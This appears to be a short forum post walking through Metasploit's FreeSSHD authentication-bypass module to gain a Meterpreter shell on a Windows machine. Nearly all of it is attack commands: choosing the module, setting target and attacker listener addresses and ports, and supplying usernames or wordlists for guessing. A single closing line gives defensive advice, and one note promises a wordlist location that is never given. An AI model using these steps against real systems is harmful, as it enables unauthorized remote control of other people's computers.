So I found an interesting exploit in Metasploit today, mainly out of boredom, and I figured I would share it here. Below you will find a step-by-step of how to use Metasploit to exploit FreeSSHD on Windows to get a Meterpreter shell.
start: FreeSSHD on your Windows victim box and check for any custom ports.
start: msfconsole in Kali
run: use exploit/windows/ssh/freesshd_authbypass
run: show options
run: set RHOST [victim ip]
run: set RPORT [victim port running ssh]
run: set LHOST [host ip]
run: set LPORT [local listening port]
Note: This exploit uses a username list for the attack; if the user that the SSH service uses to authenticate is not in this list, the exploit won't work. However, there is an option you can set if you know the username or wish to guess at it.
ex: set USERNAME crazy_user123456789
Note: You can also find larger username lists and add them to the list that Metasploit uses, located at "/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt", or you can change this path to point at your own list using the USER_FILE option.
ex: set USER_FILE /youpath/users.txt
Note: Kali, of course, has built-in wordlists, which you can find at the following location
Note: Once the exploit works, you have a Meterpreter shell.
Solution: If you are trying to protect against this attack, use a complicated username or use Cygwin sshd for Windows operating systems instead.